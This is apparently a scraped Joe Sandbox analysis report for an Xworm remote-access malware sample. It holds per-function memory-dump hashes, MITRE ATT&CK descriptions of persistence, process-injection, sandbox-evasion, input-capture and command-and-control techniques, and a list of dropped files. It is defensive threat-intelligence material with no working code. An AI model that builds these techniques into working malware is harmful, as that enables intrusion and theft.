Instruction Fuzzy Hash: 24D0C97290520CEFCB04DFA8D94099EB7FDEF4A100B5045E6DA4AE7210FE319A1057E1

Function 0645B3F0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 596646be73ad0084c838f62353f3ba8f62d6b3dc5251f940c163ed08b9df7dfb
Instruction ID: af7da04160e05387c634ca999970407dc14e7ad87f42da413a3dde86991d500b
Opcode Fuzzy Hash: 596646be73ad0084c838f62353f3ba8f62d6b3dc5251f940c163ed08b9df7dfb
Instruction Fuzzy Hash: E6D0C9321101085F4B91EF95E844C5277D9AB65610701C422A9048A122E621E424D751

Function 0645D100 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2f1d664bd5a42dc200f17d40f40ea20a69619edd9c58ff4c25a90dbc90d6cef
Instruction ID: 2dae72d44743735bdb69ab5427d19186ed8883f05c5057a7aa098402f0ee958e
Opcode Fuzzy Hash: b2f1d664bd5a42dc200f17d40f40ea20a69619edd9c58ff4c25a90dbc90d6cef
Instruction Fuzzy Hash: 58C08C3085160887D6802BA0F90C328B7BD5B06302F002022D70C405528BB00450CAE9

Function 06453490 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 214f7a0b5725d16d8521891c45b3837b14b759b4d1ff6c19206e708a0bbfe28b
Instruction ID: 604899e7fd469178471f11f54ad8da0b0abde420d625fd1730aae316b4695e6b
Opcode Fuzzy Hash: 214f7a0b5725d16d8521891c45b3837b14b759b4d1ff6c19206e708a0bbfe28b
Instruction Fuzzy Hash: E5C09B364081059F9B86BB50C9D4D29B7F1FF56314BC2CC57B54546032D771C8199712

Function 06458630 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37ff7f15ac1abffd6813ea63779fede4ba0d8c5efa55cc05a448645fe13b87ac
Instruction ID: c80923674351b1cb4c9fb5b3b6f061de7db86ec8d519d73cb2200bdf0f352609
Opcode Fuzzy Hash: 37ff7f15ac1abffd6813ea63779fede4ba0d8c5efa55cc05a448645fe13b87ac
Instruction Fuzzy Hash: 22B0127B29C242EBADC432608CD1F1FA012ABA6700BC2CC077625420018AF04865D27F

Function 06453E0E Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1c0f233d165edfee32bab4b3dea9104ed5833e0253e54099e3a0cb8a985377a
Instruction ID: 89f9ee7610ab6252efc8270cc3775c6136c1e9d19212fff18378e9791c0451b6
Opcode Fuzzy Hash: b1c0f233d165edfee32bab4b3dea9104ed5833e0253e54099e3a0cb8a985377a
Instruction Fuzzy Hash: E6C04C35D08205DFDB71CF60D4444AC7B75AB4D255B25501AB42753113D72018418F80

Function 06453160 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 06453150 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2feb94136644e675d2a4d679c27e74cd12f98251b4df26c63caaa8c2bf59a7
Instruction ID: 9ac9e19f81d659f9065995f163d117337dcf9cd7d86c23163ff551f43752247e
Opcode Fuzzy Hash: ee2feb94136644e675d2a4d679c27e74cd12f98251b4df26c63caaa8c2bf59a7
Instruction Fuzzy Hash: 6AB012300196854FC710CB00CC0CB8B7BA89B00241F01005398044A062CA21014D9A05

Function 06453E69 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bc3030b1f24988821e1e011538443a054f30d2c4362a18d44e3f72bd839dcaa
Instruction ID: d3e9a24cdec0ea82c9f94d67452589cfe74706be5741cdf64844251a4de22600
Opcode Fuzzy Hash: 0bc3030b1f24988821e1e011538443a054f30d2c4362a18d44e3f72bd839dcaa
Instruction Fuzzy Hash: 7DA0023145A840DFDE820A69848CB78B678EB092457A61891555A96152DB5148054958

Analysis Process: pNYyTm.exePID: 1132, Parent PID: 8164COMMON

Executed Functions

Function 012D1358 Relevance: .5, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83e6504163400f7c9caca224013c0b61cb36a5c77aeee0047069c6dfb0f8d11
Instruction ID: 6c558ef54cce0090287c8e3fde936205f142b20a45645511b572b8d32467443f
Opcode Fuzzy Hash: b83e6504163400f7c9caca224013c0b61cb36a5c77aeee0047069c6dfb0f8d11
Instruction Fuzzy Hash: D1028D707113048FDB18AB78D858B6E7BA6FF88700F148578E516AB3A5DF789C418F91

Function 012D1128 Relevance: .8, Instructions: 849COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1770e0a6254b3ccedf44890202451997dee288573134d5ec9add36b4ee7f5d57
Instruction ID: 086925380c15879d076cad47ba1155040a8907e55d318c0907ba388e2f77124e
Opcode Fuzzy Hash: 1770e0a6254b3ccedf44890202451997dee288573134d5ec9add36b4ee7f5d57
Instruction Fuzzy Hash: 27E1BD707113008FDB19AF74E86876E7BA6FF88200B148578D816AB7A5DF789C85CF91

Function 012D14E5 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87cef3f1eb8a89b27040a99c24a0c8bbacf4ea71180a1aebc19488cbb25644f0
Instruction ID: a07c106850d3e8d1d52506738e87f22d9fb7f5819c7da397d32215ef8740ebf1
Opcode Fuzzy Hash: 87cef3f1eb8a89b27040a99c24a0c8bbacf4ea71180a1aebc19488cbb25644f0
Instruction Fuzzy Hash: FF918B347102008FEB18AB79D85477E7AA3FF88700F248568D91AAB795DFB99C418B91

Function 012D0D38 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb01c48e0dcf3003edef3d6b8d7a60d1f9b97af8afe46cc05471b331d8425d2
Instruction ID: f1314a18907676b0f63e1bbb523b3f31c5eac5016e43e7ebe2c25008a4b20254
Opcode Fuzzy Hash: 6fb01c48e0dcf3003edef3d6b8d7a60d1f9b97af8afe46cc05471b331d8425d2
Instruction Fuzzy Hash: C631E275B103059FDB08AFB9C8053AEBBAAFFD9600F10802DE54AE7751DE749C418B56

Function 012D0E58 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb23d8b1788fa3cd82c7b0407e93f778ff736f19ad565fab83177b030daf139e
Instruction ID: 47ef9bb48f11b02f6518a152d707bda112fcbe0672edbca17eca88f9789ecff5
Opcode Fuzzy Hash: fb23d8b1788fa3cd82c7b0407e93f778ff736f19ad565fab83177b030daf139e
Instruction Fuzzy Hash: 9421DD30B112158FCB59EB7D896463E7BE2BFC9200F2484ADE509DB392EE749D018796

Function 012D0E48 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd73f339425c782c306d46cf5af97ca1b12205ed8a7108b8626874ca47398aea
Instruction ID: db0d060220da14bc1fa460a2f6fbc116d1d1120b48b5b002f57da7b8a75f0e5c
Opcode Fuzzy Hash: bd73f339425c782c306d46cf5af97ca1b12205ed8a7108b8626874ca47398aea
Instruction Fuzzy Hash: 3121F130B112158FCB59DB7D895063F7BE2BFC9200F2884ADE109EB392DE349D018795

Function 012D0C2B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3973aaf24e500a037a897ddd0103c217fc809e5526f8c3bd11142825317509
Instruction ID: 22e60b275e4b1da8753ac7c2be69bf4e3ba8c5b59b8746a1b919ea8ea809ec08
Opcode Fuzzy Hash: 1c3973aaf24e500a037a897ddd0103c217fc809e5526f8c3bd11142825317509
Instruction Fuzzy Hash: 92213C709103099FDB05EF74D4546AE7BB6FF89204F50856DD406A7350DB789A40CF51

Function 012D0C30 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 787f6798a1be41ba52bfa357f4d60661a2d092209ec0a92dc63e1da4624d894e
Instruction ID: f16a898e0dd9099312791f5a34f04b00244c6215cb1b669cc4b384cfa36e9523
Opcode Fuzzy Hash: 787f6798a1be41ba52bfa357f4d60661a2d092209ec0a92dc63e1da4624d894e
Instruction Fuzzy Hash: 5B216DB0A003099FDB05EFB4D8546AE7BBAFF89204F50856CD405A7340DB78AE80CF51

Function 012D0959 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4cdeb5ed2996978268d903bd58ddd8266753ec632c0062713043012b11b93f9
Instruction ID: 2457c3708a95d287681d6384cbb9a3aad643279a5f7fc0f5f1985058f1e92690
Opcode Fuzzy Hash: d4cdeb5ed2996978268d903bd58ddd8266753ec632c0062713043012b11b93f9
Instruction Fuzzy Hash: 3B21D430E15204CFDB58DFB8D5143AEBBB2EF88200F2481AAD109EB395DB749D55C786

Function 012D0838 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 524b995949d83e58ec2a760b910af13694b035bbd886bc5ad4cf76cfc21cc402
Instruction ID: 624740f4ae259eefa106a4e9717865f209ea053dd8a86e7505e953868b6e6e2f
Opcode Fuzzy Hash: 524b995949d83e58ec2a760b910af13694b035bbd886bc5ad4cf76cfc21cc402
Instruction Fuzzy Hash: 7F2151B0211345CFDB02EF24F980B47777DFB46604744A6B8D445AB226D6BC6D89CF92

Function 012D0848 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1407803843.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12d0000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525776b9e0cd2827da293ab235500036da55ba7e07a57af507947d4f7d2743ea
Instruction ID: a3bb263ee98bb6773881691625d3a88231234c88f404213d34246ab7fdf7138f
Opcode Fuzzy Hash: 525776b9e0cd2827da293ab235500036da55ba7e07a57af507947d4f7d2743ea
Instruction Fuzzy Hash: 9E21A9B021130ADFDB01EF24F984A4773ADFB49644740A6B89445AB225E6BC6D89CF92

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pNYyTm.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bkznsjo.q05.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akd2gzge.xtu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckwrtllv.ppw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_me1zbdde.d2r.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oba4v0sr.iuv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0u5ydwp.odu.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1necarw.5ft.ps1

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre